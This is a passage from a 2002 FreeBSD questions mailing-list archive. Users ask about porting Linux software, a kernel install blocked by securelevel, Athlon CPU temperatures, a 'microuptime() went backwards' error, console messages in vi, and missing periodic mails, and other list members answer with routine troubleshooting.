FreeBSD.ORG Am Di, 2002-06-25 um 11.23 schrieb Gavin Kenny: > Hi Guys, > > I'm going to have a go at porting the VideoLan Server > to FreeBSD. It was written for Linux and there is a > Darwin (Mac OS) port, so I'm kinda hoping it shouldn't > be too hard (famous last words). > > I never written anything for FreeBSD, so what should I > look out for? Any good pointers, tips, different > naming conventions for libraries etc or better still > HOW-TO's, would be really useful. Do you know the Porters Handbook? http://www.freebsd.org/doc/en_US.ISO8859-1/books/porters-handbook/ Martin -- Virtuelle Jugendarbeit auf http://create.kleinerdrache.org ... bald kommt ein neues Layout ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:10:11 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.ideal.net.au (ion.ideal.net.au [203.20.241.5]) by hub.freebsd.org (Postfix) with ESMTP id 187FD37B76B for ; Tue, 25 Jun 2002 02:56:47 -0700 (PDT) Received: from localhost (peter@localhost) by mail.ideal.net.au (8.9.3/8.9.3) with ESMTP id TAA35982 for ; Tue, 25 Jun 2002 19:56:38 +1000 (EST) (envelope-from peter@ion.ideal.net.au) Date: Tue, 25 Jun 2002 19:56:38 +1000 (EST) From: Peter MacGee To: Subject: Kernel install problems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi All, I'm currently trying to install a new kernel on my system (4.6-STABLE). I have tried both the "new" and the "traditional" methods that are prescribed in the handbook, and both times come up against the error: chflags noschg /kernel chflags: /kernel: Operation not permitted *** Error code 1 (ignored) mv /kernel /kernel.old mv: rename /kernel to /kernel.old: Operation not permitted *** Error code 1 I have searched archives et al all to no avail. Could anyone please help on how to fix this problem? Regards, Pete. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:24:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from avocet.mail.pas.earthlink.net (avocet.mail.pas.earthlink.net [207.217.120.50]) by hub.freebsd.org (Postfix) with ESMTP id 9176E37B799 for ; Tue, 25 Jun 2002 03:21:35 -0700 (PDT) Received: from dialup-209.246.210.55.dial1.philadelphia1.level3.net ([209.246.210.55] helo=sparky) by avocet.mail.pas.earthlink.net with smtp (Exim 3.33 #2) id 17MnRP-0006cF-00; Tue, 25 Jun 2002 03:20:55 -0700 From: Jud To: "FreeBSD.org - Questions" , gauthamg123list@myrealbox.com Date: Tue, 25 Jun 2002 06:21:18 -0400 X-Priority: 3 (Normal) In-Reply-To: Message-Id: <2WYU5YEDSOS63OKYSZXKIOJ1VXRSPUQ.3d18441e@sparky> Subject: RE: [OFF] Pentium vs Athlon which is better MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Opera 6.04 build 1133 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG 6/25/2002 12:10:21 AM, "Gautham Ganapathy" wrote: [snip] >I have an Athlon (tbird 850) running on an A7V333. AMD approved >heatsink/fan. The CPU temp often goes to around 85C and the fan is >genarally at around 6000rpm (smashed my finger on it once). is this >normal ? motherboard temp is somewhere at 50C. the temp hike is >generally when i am in freebsd or playing games in win2k. running normal >apps (ie, editors, etc) is generally not a problem. is this a problem >b/w the cpu and the mb Not between your mb and your CPU. Your heatsink, fan and case cooling. (BTW, what is the ambient temperature in the computer room?) Have a case with some room in it for air circulation. Have both intake (in front, low) and exhaust (in back, high) fans in it. PC Power and Cooling sells very quiet but effective "Silencer" fans that work well for this. Also, make sure your power supply has an adequate exhaust fan. Re your CPU heatsink and fan, there are sites, reviews and resellers all over the Web about this. While any AMD approved heatsink and fan ought to keep your CPU from overheating if the case ventilation is adequate, just below 90-95C is not where you want to be. The CPU won't die immediately, but cooler conditions may cause it to live longer and will leave more of a margin for "error" (dust accumulation, warm days, etc.). Read about how to prepare and install a heatsink and fan with thermal compound to promote heat transfer between the CPU core and heatsink. Then select a heatsink/fan that gives you good cooling at an acceptable noise level, AND IS EASY TO ATTACH OR REMOVE WITHOUT THE DANGER OF STICKING A SCREWDRIVER THROUGH YOUR MOTHERBOARD. (This latter will depend on your own aptitude with tools to some extent.;) After trying several heatsink/fans I've personally settled on the Thermal Integration TI77N, but there are likely almost as many opinions in this regard as there are custom built computers with AMD CPUs. The maximum temperature I see is around 55-56C. Jud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:30: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cpimssmtpu09.email.msn.com (cpimssmtpu09.email.msn.com [207.46.181.84]) by hub.freebsd.org (Postfix) with ESMTP id 9549C37B400 for ; Tue, 25 Jun 2002 03:29:56 -0700 (PDT) Received: from thebe ([67.24.229.195]) by cpimssmtpu09.email.msn.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 03:29:07 -0700 From: "Aaron Burke" To: "FreeBSD-Questions" Subject: microuptime() went backwards Date: Tue, 25 Jun 2002 03:28:49 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-OriginalArrivalTime: 25 Jun 2002 10:29:08.0193 (UTC) FILETIME=[235BE510:01C21C33] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I am encountering a new problem with my primary unix machine. In the last two weeks, I have been getting the error "microuptime() went backwards (49869.438718 -> 49869.-694941947)". The numbers do change with each message. I am not running any real time critical applications on this box, but I am wondering if there is a config file that needs changing, or if my hardware is causing problems. I have also noticed no other errors due to this other than the messages that get sent to the system log. Thanks in advance to anyone who can explain this problem, and double-thanks to anyone who knows a way to solve it. Aaron Burke aburke@nullplusone.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:34:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cpimssmtpu04.email.msn.com (cpimssmtpu04.email.msn.com [207.46.181.80]) by hub.freebsd.org (Postfix) with ESMTP id 8809D37B404 for ; Tue, 25 Jun 2002 03:34:20 -0700 (PDT) Received: from thebe ([67.24.229.195]) by cpimssmtpu04.email.msn.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 03:33:32 -0700 From: "Aaron Burke" To: "Peter MacGee" Cc: "FreeBSD-Questions" Subject: RE: Kernel install problems Date: Tue, 25 Jun 2002 03:33:13 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: X-OriginalArrivalTime: 25 Jun 2002 10:33:32.0671 (UTC) FILETIME=[C10008F0:01C21C33] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Peter MacGee > Sent: Tuesday, June 25, 2002 02:57 AM > To: freebsd-questions@FreeBSD.ORG > Subject: Kernel install problems > > > Hi All, > I'm currently trying to install a new kernel on my system > (4.6-STABLE). I have tried both the "new" and the "traditional" > methods that are prescribed in the handbook, and both times come up > against the error: > > chflags noschg /kernel > chflags: /kernel: Operation not permitted > *** Error code 1 (ignored) > mv /kernel /kernel.old > mv: rename /kernel to /kernel.old: Operation not permitted > *** Error code 1 > > I have searched archives et al all to no avail. Could anyone please help > on how to fix this problem? Are you running as root while doing these operations? > Regards, > Pete. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:39:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jacqueshau.co.za (mail.jacqueshau.co.za [196.25.105.194]) by hub.freebsd.org (Postfix) with ESMTP id BF74C37B406 for ; Tue, 25 Jun 2002 03:39:17 -0700 (PDT) Received: from johan (helmut.jacqueshau.co.za [192.168.0.50] (may be forged)) by jacqueshau.co.za (8.11.1/8.11.1) with ESMTP id g5PAvKg97813 for ; Tue, 25 Jun 2002 12:57:22 +0200 (SAST) (envelope-from johand@jacqueshau.co.za) From: "Johan du Toit" To: freebsd-questions@FreeBSD.ORG Date: Tue, 25 Jun 2002 14:37:14 +0200 MIME-Version: 1.0 Subject: Support Request...vi related Message-ID: <3D18801A.11965.A98DF8@localhost> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Good Day! I am fairly new in the freeBSD arena and would like to raise this simple question... How can I prevent system messages from scrolling while busy editing a file in vi ?? It is nearly impossible doing it as you can imagine. I have tried using the :set nomsg command, but no luck. Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:42: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web20003.mail.yahoo.com (web20003.mail.yahoo.com [216.136.225.48]) by hub.freebsd.org (Postfix) with SMTP id EBA2937B47E for ; Tue, 25 Jun 2002 03:41:00 -0700 (PDT) Message-ID: <20020625104100.72418.qmail@web20003.mail.yahoo.com> Received: from [193.123.204.66] by web20003.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 11:41:00 BST Date: Tue, 25 Jun 2002 11:41:00 +0100 (BST) From: =?iso-8859-1?q?Gavin=20Kenny?= Subject: Re: Porting Tips To: Martin Klaffenboeck Cc: questions@freebsd.org In-Reply-To: <1024999359.677.16.camel@martin.kleinerdrache.org> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --- Martin Klaffenboeck wrote: > Am Di, 2002-06-25 um 11.23 schrieb Gavin Kenny: > > Hi Guys, > > > > I'm going to have a go at porting the VideoLan > Server > > to FreeBSD. It was written for Linux and there is > a > > Darwin (Mac OS) port, so I'm kinda hoping it > shouldn't > > be too hard (famous last words). > > > > I never written anything for FreeBSD, so what > should I > > look out for? Any good pointers, tips, different > > naming conventions for libraries etc or better > still > > HOW-TO's, would be really useful. > > Do you know the Porters Handbook? > > http://www.freebsd.org/doc/en_US.ISO8859-1/books/porters-handbook/ > > Martin > > -- I have had a look at it but it seems more concerned in building a FreeBSD Port (a fantastic invention by the way ;-) rather than how to take a piece of software that was written for Linux (or any other operating system) and getting it to compile and run on FreeBSD. Am I being naive? Gavin __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:42:28 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.ideal.net.au (ion.ideal.net.au [203.20.241.5]) by hub.freebsd.org (Postfix) with ESMTP id CF74C37B41D for ; Tue, 25 Jun 2002 03:41:01 -0700 (PDT) Received: from localhost (peter@localhost) by mail.ideal.net.au (8.9.3/8.9.3) with ESMTP id UAA38443; Tue, 25 Jun 2002 20:40:49 +1000 (EST) (envelope-from peter@ion.ideal.net.au) Date: Tue, 25 Jun 2002 20:40:49 +1000 (EST) From: Peter MacGee To: Aaron Burke Cc: FreeBSD-Questions Subject: RE: Kernel install problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi Aaron and Everyone, On Tue, 25 Jun 2002, Aaron Burke wrote: > > -----Original Message----- > > From: owner-freebsd-questions@FreeBSD.ORG > > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Peter MacGee > > Sent: Tuesday, June 25, 2002 02:57 AM > > To: freebsd-questions@FreeBSD.ORG > > Subject: Kernel install problems > > > > > > Hi All, > > I'm currently trying to install a new kernel on my system > > (4.6-STABLE). I have tried both the "new" and the "traditional" > > methods that are prescribed in the handbook, and both times come up > > against the error: > > > > chflags noschg /kernel > > chflags: /kernel: Operation not permitted > > *** Error code 1 (ignored) > > mv /kernel /kernel.old > > mv: rename /kernel to /kernel.old: Operation not permitted > > *** Error code 1 > > > > I have searched archives et al all to no avail. Could anyone please help > > on how to fix this problem? > > Are you running as root while doing these operations? Yes indeed. I have also had this exact same problem on another box of mine running 4.5-RELEASE... Both times I was root whilst trying to perform the operation. Cheers, Pete. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:44:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id 75B7737B405 for ; Tue, 25 Jun 2002 03:44:21 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5PAiDDd000971; Tue, 25 Jun 2002 05:44:14 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: Support Request...vi related From: Larry Rosenman To: Johan du Toit Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: <3D18801A.11965.A98DF8@localhost> References: <3D18801A.11965.A98DF8@localhost> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 05:44:13 -0500 Message-Id: <1025001854.379.6.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 2002-06-25 at 07:37, Johan du Toit wrote: > Good Day! > > I am fairly new in the freeBSD arena and would like to raise this > simple question... > > How can I prevent system messages from scrolling while busy > editing a file in vi ?? It is nearly impossible doing it as you can > imagine. > > I have tried using the :set nomsg command, but no luck. I assume you are talking about while logged in as root. I also assume these are syslog type messages. You can edit /etc/syslog.conf to turn them off, or not log in as root. What messages, BTW? If you are generating a LOT of console traffic from syslog, something might need to be set up differently. LER > > Thanks! > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:45:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.lerctr.org (lerlaptop.lerctr.org [207.158.72.14]) by hub.freebsd.org (Postfix) with ESMTP id 4339A37B401 for ; Tue, 25 Jun 2002 03:45:04 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.lerctr.org (8.12.4/8.12.4) with ESMTP id g5PAitDd000988; Tue, 25 Jun 2002 05:44:57 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: RE: Kernel install problems From: Larry Rosenman To: Peter MacGee Cc: Aaron Burke , FreeBSD-Questions In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 05:44:55 -0500 Message-Id: <1025001897.379.8.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 2002-06-25 at 05:40, Peter MacGee wrote: > Hi Aaron and Everyone, > > On Tue, 25 Jun 2002, Aaron Burke wrote: > > > > -----Original Message----- > > > From: owner-freebsd-questions@FreeBSD.ORG > > > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Peter MacGee > > > Sent: Tuesday, June 25, 2002 02:57 AM > > > To: freebsd-questions@FreeBSD.ORG > > > Subject: Kernel install problems > > > > > > > > > Hi All, > > > I'm currently trying to install a new kernel on my system > > > (4.6-STABLE). I have tried both the "new" and the "traditional" > > > methods that are prescribed in the handbook, and both times come up > > > against the error: > > > > > > chflags noschg /kernel > > > chflags: /kernel: Operation not permitted > > > *** Error code 1 (ignored) > > > mv /kernel /kernel.old > > > mv: rename /kernel to /kernel.old: Operation not permitted > > > *** Error code 1 > > > > > > I have searched archives et al all to no avail. Could anyone please help > > > on how to fix this problem? > > > > Are you running as root while doing these operations? > > Yes indeed. I have also had this exact same problem on another box of mine > running 4.5-RELEASE... Both times I was root whilst trying to perform the > operation. I'll bet your kern.securelevel is >0. > > Cheers, > Pete. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:46:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from grillolja.cs.umu.se (grillolja.cs.umu.se [130.239.40.17]) by hub.freebsd.org (Postfix) with ESMTP id 78E4C37B404 for ; Tue, 25 Jun 2002 03:46:29 -0700 (PDT) Received: from gren.cs.umu.se (gren.cs.umu.se [130.239.40.187]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by grillolja.cs.umu.se (Postfix) with ESMTP id 2AC949FD8 for ; Tue, 25 Jun 2002 12:46:28 +0200 (MEST) Date: Tue, 25 Jun 2002 12:46:27 +0200 (MEST) From: Paul Everlund To: freebsd-questions@freebsd.org Subject: Periodic mails Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi again! Thanks for the two replies I got, but unfortunately none of them did help, so I try again... In 4.5 I had sendmail_enable="NO" and got my periodic mails. In 4.6 I have sendmail_enable="NONE" and do not get any periodic mails. In /var/log/messages I see: Jun 25 03:02:57 fw /kernel: Connection attempt to TCP 213.64.yy.xx:25 from 192.168.0.5:1325 Should I set sendmail_enable to "NO" in 4.6, instead of "NONE" to recieve them? If that's the case, what security risks are there by using "NO"? Would appreciate an answer from any one out there who can help me out! :-) Thanks in advance! Best regards, Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:51:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.ideal.net.au (ion.ideal.net.au [203.20.241.5]) by hub.freebsd.org (Postfix) with ESMTP id B322D37B401 for ; Tue, 25 Jun 2002 03:51:13 -0700 (PDT) Received: from localhost (peter@localhost) by mail.ideal.net.au (8.9.3/8.9.3) with ESMTP id UAA38934; Tue, 25 Jun 2002 20:50:59 +1000 (EST) (envelope-from peter@ideal.net.au) Date: Tue, 25 Jun 2002 20:50:59 +1000 (EST) From: Peter MacGee To: Larry Rosenman Cc: Aaron Burke , FreeBSD-Questions Subject: RE: Kernel install problems In-Reply-To: <1025001897.379.8.camel@lerlaptop> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi Larry, On 25 Jun 2002, Larry Rosenman wrote: > On Tue, 2002-06-25 at 05:40, Peter MacGee wrote: > > Hi Aaron and Everyone, > > > > On Tue, 25 Jun 2002, Aaron Burke wrote: > > > > > > -----Original Message----- > > > > From: owner-freebsd-questions@FreeBSD.ORG > > > > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Peter MacGee > > > > Sent: Tuesday, June 25, 2002 02:57 AM > > > > To: freebsd-questions@FreeBSD.ORG > > > > Subject: Kernel install problems > > > > > > > > > > > > Hi All, > > > > I'm currently trying to install a new kernel on my system > > > > (4.6-STABLE). I have tried both the "new" and the "traditional" > > > > methods that are prescribed in the handbook, and both times come up > > > > against the error: > > > > > > > > chflags noschg /kernel > > > > chflags: /kernel: Operation not permitted > > > > *** Error code 1 (ignored) > > > > mv /kernel /kernel.old > > > > mv: rename /kernel to /kernel.old: Operation not permitted > > > > *** Error code 1 > > > > > > > > I have searched archives et al all to no avail. Could anyone please help > > > > on how to fix this problem? > > > > > > Are you running as root while doing these operations? > > > > Yes indeed. I have also had this exact same problem on another box of mine > > running 4.5-RELEASE... Both times I was root whilst trying to perform the > > operation. > I'll bet your kern.securelevel is >0. You're quite correct, a quick scan of /etc/rc.conf reveals: kern_securelevel="2" kern_securelevel_enable="YES" Should I comment these lines out, reboot, make install, re-instate kern_securelevel lines, reboot and life be dandy? Thanks for the help thus far, Pete. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:52:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from grillolja.cs.umu.se (grillolja.cs.umu.se [130.239.40.17]) by hub.freebsd.org (Postfix) with ESMTP id 215ED37B404 for ; Tue, 25 Jun 2002 03:52:13 -0700 (PDT) Received: from gren.cs.umu.se (gren.cs.umu.se [130.239.40.187]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by grillolja.cs.umu.se (Postfix) with ESMTP id 3600A9FD7; Tue, 25 Jun 2002 12:52:12 +0200 (MEST) Date: Tue, 25 Jun 2002 12:52:11 +0200 (MEST) From: Paul Everlund To: =?iso-8859-1?q?Gavin=20Kenny?= Cc: Martin Klaffenboeck , Subject: Re: Porting Tips In-Reply-To: <20020625104100.72418.qmail@web20003.mail.yahoo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Gavin Kenny wrote: > --- Martin Klaffenboeck > wrote: > Am Di, 2002-06-25 um 11.23 schrieb Gavin > Kenny: > > > Hi Guys, > > > > > > I'm going to have a go at porting the VideoLan > > > Server to FreeBSD. It was written for Linux and > > > there is a Darwin (Mac OS) port, so I'm kinda > > > hoping it shouldn't be too hard (famous last > > > words). > > > > > > I never written anything for FreeBSD, so what > > > should I look out for? Any good pointers, tips, > > > different naming conventions for libraries etc > > > or better still HOW-TO's, would be really useful. > > > > Do you know the Porters Handbook? > > > > http://www.freebsd.org/doc/en_US.ISO8859-1/books/porters-handbook/ > > > > Martin > > I have had a look at it but it seems more concerned in > building a FreeBSD Port (a fantastic invention by the > way ;-) rather than how to take a piece of software > that was written for Linux (or any other operating > system) and getting it to compile and run on FreeBSD. > Am I being naive? > > Gavin Have "ported" some applications to FreeBSD that where meant for Linux and Solaris. What I did was compiling the code with a lot of warning options turned on, then fixing errors as they did appear. One was for example O_SYNC to O_FSYNC. In the end it did run ok! Not a "nice" way of porting applications I guess, but it has worked for me. :-) Good luck! Best regards, Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:53:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from martin.kleinerdrache.org (static62-99-146-055.adsl.inode.at [62.99.146.55]) by hub.freebsd.org (Postfix) with SMTP id 529CD37B405 for ; Tue, 25 Jun 2002 03:53:19 -0700 (PDT) Received: (qmail 12092 invoked from network); 25 Jun 2002 10:55:44 -0000 Received: from unknown (HELO localhost.kdrache.org) (127.0.0.1) by loopback with SMTP; 25 Jun 2002 10:55:44 -0000 Subject: Re: Porting Tips From: Martin Klaffenboeck To: Gavin Kenny Cc: questions@freebsd.org In-Reply-To: <20020625104100.72418.qmail@web20003.mail.yahoo.com> References: <20020625104100.72418.qmail@web20003.mail.yahoo.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 25 Jun 2002 12:55:44 +0200 Message-Id: <1025002544.677.25.camel@martin.kleinerdrache.org> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Am Di, 2002-06-25 um 12.41 schrieb Gavin Kenny: > --- Martin Klaffenboeck > wrote: > Am Di, 2002-06-25 um 11.23 schrieb Gavin > Kenny: > > > Hi Guys, > > > > > > I'm going to have a go at porting the VideoLan > > Server > > > to FreeBSD. It was written for Linux and there is > > a > > > Darwin (Mac OS) port, so I'm kinda hoping it > > shouldn't > > > be too hard (famous last words). > > > > > > I never written anything for FreeBSD, so what > > should I > > > look out for? Any good pointers, tips, different > > > naming conventions for libraries etc or better > > still > > > HOW-TO's, would be really useful. > > > > Do you know the Porters Handbook? > > > > > http://www.freebsd.org/doc/en_US.ISO8859-1/books/porters-handbook/ > > > > Martin > > > > -- > > I have had a look at it but it seems more concerned in > building a FreeBSD Port (a fantastic invention by the > way ;-) rather than how to take a piece of software > that was written for Linux (or any other operating > system) and getting it to compile and run on FreeBSD. > Am I being naive? Oh, sorry, ... Ok, there is not really a simple way to port software to other platforms. If your programm is written in a way to port for multiplatforms, you may just have to find any config.h file or edit the Makefile. That should work for you. In that case a Programm is really simply written for linux, you have to take the whole programm und try and try to make it compile and run under freebsd. Than do the patches... Sometimes it's a really hard work... Martin -- Virtuelle Jugendarbeit auf http://create.kleinerdrache.org ... bald kommt ein neues Layout ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 3:56:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from go4.ext.ti.com (dlezb.ext.ti.com [192.91.75.132]) by hub.freebsd.org (Postfix) with ESMTP id 4903237B400 for ; Tue, 25 Jun 2002 03:56:13 -0700 (PDT) Received: from dlep8.itg.ti.com ([157.170.134.88]) by go4.ext.ti.com (8.11.6/8.11.6) with ESMTP id g5PAuCe04792; Tue, 25 Jun 2002 05:56:12 -0500 (CDT) Received: from dlep8.itg.ti.com (localhost [127.0.0.1]) by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id FAA01234; Tue, 25 Jun 2002 05:56:12 -0500 (CDT) Received: from popsvr.india.ti.com (popsvr.india.ti.com [157.87.95.215]) by dlep8.itg.ti.com (8.9.3/8.9.3) with ESMTP id FAA01175; Tue, 25 Jun 2002 05:56:08 -0500 (CDT) Received: from gautham ([192.168.185.126]) by popsvr.india.ti.com (8.8.8/8.8.8) with SMTP id QAA25950; Tue, 25 Jun 2002 16:26:02 +0530 (IST) Reply-To: From: "Gautham Ganapathy" To: "Jud" Cc: "FreeBSD.org - Questions" Subject: RE: [OFF] Pentium vs Athlon which is better Date: Tue, 25 Jun 2002 16:26:52 +0530 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <2WYU5YEDSOS63OKYSZXKIOJ1VXRSPUQ.3d18441e@sparky> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tuesday, June 25, 2002 3:51 PM, Jud wrote: > 6/25/2002 12:10:21 AM, "Gautham Ganapathy" > wrote: > > [snip] > >I have an Athlon (tbird 850) running on an A7V333. AMD approved > >heatsink/fan. The CPU temp often goes to around 85C and the fan is > >genarally at around 6000rpm (smashed my finger on it once). is this > 